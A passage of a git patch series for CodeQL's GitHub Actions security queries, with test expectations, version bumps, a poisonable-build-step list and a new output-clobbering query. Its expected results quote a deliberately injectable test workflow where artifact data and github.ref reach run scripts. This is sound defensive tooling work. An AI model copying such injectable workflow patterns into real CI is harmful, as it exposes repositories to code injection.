needs.get-artifacts.outputs.ref | provenance | | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | provenance | | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -320,6 +329,16 @@ nodes | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | semmle.label | Job outputs node [pr_num] | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | semmle.label | steps.set-ref.outputs.pr_num | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | semmle.label | steps.set-ref.outputs.ref | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | semmle.label | Run Step: set-ref [pr_num] | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | semmle.label | Run Step: set-ref [ref] | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -442,6 +461,8 @@ subpaths | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index bb58a7395a1a..360c33720fb0 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -92,6 +92,15 @@ edges | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | provenance | | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | provenance | | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -320,6 +329,16 @@ nodes | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | semmle.label | Job outputs node [pr_num] | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | semmle.label | steps.set-ref.outputs.pr_num | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | semmle.label | steps.set-ref.outputs.ref | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | semmle.label | Run Step: set-ref [pr_num] | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | semmle.label | Run Step: set-ref [ref] | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 2dffb865d0bc7f2d6ca5d5e9791ec579823633b0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Jul 2024 12:45:34 +0200 Subject: [PATCH 422/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 75d8cd5d2e0c..285ea6e16808 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.22 +version: 0.1.23 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ce8ab4c24dd4..a51e583b32c4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.22 +version: 0.1.23 groups: [actions, queries] suites: codeql-suites extractor: javascript From 12e78ac4fe4162920e0418129f90a5b2fc8a35ba Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Jul 2024 23:37:04 +0200 Subject: [PATCH 423/707] fix(regex): update pattern to match both gh and hub commands --- ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index be0229a77c4b..fba33bb8bc87 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -242,7 +242,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string line | this.getScript().splitAt("\n") = line and - line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and + line.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(line) or containsPullRequestNumber(line)) or From da28f7dc0af47b59f6d0fe29116677e3d1ed3180 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 15:56:47 +0200 Subject: [PATCH 424/707] feat(config): add asv to poisonable steps list --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 7f07f696445c..1e0abb02d44d 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -16,6 +16,7 @@ extensions: # source: https://boostsecurityio.github.io/lotp/ data: - ["ant"] + - ["asv"] - ["awk\\s+-f"] - ["bundle"] - ["cargo"] From bb78bb6f570e6b335c0d25b2986a25c2302c0e81 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 18:27:00 +0200 Subject: [PATCH 425/707] refactor(queries): update severity level for workflow permissions --- ql/src/Security/CWE-275/MissingActionsPermissions.ql | 2 +- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql index 9373bf808e34..ffb217739c75 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.ql +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql @@ -3,7 +3,7 @@ * @description Workflows should contain permissions to provide a clear understanding has permissions to run the workflow. * @kind problem * @security-severity 5.0 - * @problem.severity warning + * @problem.severity recommendation * @precision high * @id actions/missing-workflow-permissions * @tags actions diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 58561ca6dba4..ecdb1d065263 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -3,7 +3,7 @@ * @description Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. * @kind problem * @security-severity 5.0 - * @problem.severity warning + * @problem.severity recommendation * @precision high * @id actions/unpinned-tag * @tags security From ba6ab04dfca19cb6fbd6447e20ac8ad55b8b9ecb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 18:27:39 +0200 Subject: [PATCH 426/707] feat(suite): Remove severity:warning queries from CodeScanning suite --- ql/src/codeql-suites/actions-code-scanning.qls | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index d0fd74736ce7..801b22b0005c 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -8,12 +8,17 @@ tags contain: - security - maintainability + problem.severity: + - error + - recommendation - include: kind: - diagnostic - exclude: + problem.severity: + - warning tags contain: - experimental - testing From 28cc06e1361d34a35a1e10ccc89ca97547187fb9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 18:28:09 +0200 Subject: [PATCH 427/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 285ea6e16808..89923580de55 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.23 +version: 0.1.24 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a51e583b32c4..776f51b17321 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.23 +version: 0.1.24 groups: [actions, queries] suites: codeql-suites extractor: javascript From eaf034e8cb02b8fd84d14f1ae5e4614ec336c3db Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 25 Jul 2024 11:09:02 +0200 Subject: [PATCH 428/707] feat(config): Add pipx as poisonable step --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 1e0abb02d44d..e2742fd60a7c 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -40,6 +40,7 @@ extensions: - ["phpstan"] - ["pip\\s+install\\s+-r"] - ["pip\\s+install\\s+--requirement"] + - ["pipx\\s+install\\s+\\."] - ["poetry"] - ["pylint"] - ["pytest"] From e3df12d77bd3f4af9c7435d01cd13b39b639db0b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 29 Jul 2024 22:37:47 +0200 Subject: [PATCH 429/707] Update Query suite --- .../codeql-suites/actions-code-scanning.qls | 19 ++----------------- 1 file changed, 2 insertions(+), 17 deletions(-) diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index 801b22b0005c..ce3ff4893356 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -1,26 +1,11 @@ - description: Standard Code Scanning queries for Actions -- queries: . - +- queries: '.' - include: - kind: - - problem - - path-problem - tags contain: - - security - - maintainability problem.severity: - error - recommendation - -- include: - kind: - - diagnostic - - exclude: - problem.severity: - - warning tags contain: - experimental - - testing - debug - - model-generator + From 06ec94e731dd0f4878e937e825345a4f4e5f3f65 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 29 Jul 2024 22:38:42 +0200 Subject: [PATCH 430/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 89923580de55..395b875e1be5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.24 +version: 0.1.25 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 776f51b17321..290b58482bc4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.24 +version: 0.1.25 groups: [actions, queries] suites: codeql-suites extractor: javascript From da36924bb1098a89adcb425dc5532e966ca90ff2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 10:26:41 +0200 Subject: [PATCH 431/707] feat(queries): Add Output Clobbering query --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../security/OutputClobberingQuery.qll | 101 ++++++++++++++---- .../Security/CWE-077/OutputClobberingHigh.ql | 37 +++++++ .../CWE-094/OutputClobberingMedium.ql | 31 ------ .../CWE-077/.github/workflows/output1.yml | 38 +++++++ .../CWE-077/OutputClobberingHigh.expected | 12 +++ .../CWE-077/OutputClobberingHigh.qlref | 1 + 7 files changed, 167 insertions(+), 55 deletions(-) create mode 100644 ql/src/Security/CWE-077/OutputClobberingHigh.ql delete mode 100644 ql/src/Security/CWE-094/OutputClobberingMedium.ql create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml create mode 100644 ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected create mode 100644 ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e16bc00f8ea9..5d0d45c26c15 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -113,7 +113,7 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run.getScriptScalar() and ( - envToSpecialFile(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) or + envToSpecialFile(["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], var_name, run, _) or envToArgInjSink(var_name, run, _) ) ) diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index f1811ed57625..a67be6e35627 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -1,43 +1,98 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.security.CodeInjectionQuery private import codeql.actions.security.ArtifactPoisoningQuery -import codeql.actions.dataflow.FlowSources +private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow +import codeql.actions.dataflow.FlowSources -abstract class OutputClobberingSource extends Step { } +abstract class OutputClobberingSink extends DataFlow::Node { } -class RunOutputClobbering extends OutputClobberingSource, Run { - RunOutputClobbering() { - exists(UntrustedArtifactDownloadStep download, string script | - download.getAFollowingStep() = this and - this.getScript() = script and - exists(int i | - script.splitAt("\n", i).matches(["%GITHUB_OUTPUT%", "%::set-output name%"]) and - i < count(string line | line = script.splitAt("\n") | line) - 1 +/** + * Holds if a Run step declares an environment variable with contents from a local file. + * e.g. + * run: | + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT + * echo "sha=$(> $GITHUB_OUTPUT + */ +class OutputClobberingFromFileReadSink extends OutputClobberingSink { + OutputClobberingFromFileReadSink() { + exists(Run run, UntrustedArtifactDownloadStep step, string content, string key, string value | + this.asExpr() = run.getScriptScalar() and + step.getAFollowingStep() = run and + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) and + // there is a different output variable in the same script + // TODO: key2/value2 should be declared before key/value + exists(string content2, string key2 | + writeToGitHubOutput(run, content2) and + extractVariableAndValue(content2, key2, _) and + not key2 = key + ) and + ( + outputsPartialFileContent(value) + or + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_OUTPUT + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) + ) ) ) } } /** - * A taint-tracking configuration for unsafe user input - * that is used to construct and evaluate a code script. + * Holds if a Run step declares an environment variable, uses it to declare env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "FOO=$BODY" >> $GITHUB_OUTPUT */ -private module OutputClobberingConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source.asExpr() instanceof OutputClobberingSource } +class OutputClobberingFromEnvVarSink extends OutputClobberingSink { + OutputClobberingFromEnvVarSink() { + exists(Run run, string var_name, string key | + envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and + // there is a different output variable in the same script + // TODO: key2/value2 should be declared before key/value + exists(string content2, string key2 | + writeToGitHubOutput(run, content2) and + extractVariableAndValue(content2, key2, _) and + not key2 = key + ) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() + ) + } +} - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +class OutputClobberingFromMaDSink extends OutputClobberingSink { + OutputClobberingFromMaDSink() { madSink(this, "output-clobbering") } +} - predicate isAdditionalFlowStep(DataFlow::Node prev, DataFlow::Node succ) { - exists(StepsExpression e | - e.getTarget() = prev.asExpr() and - prev.asExpr() instanceof OutputClobberingSource and - 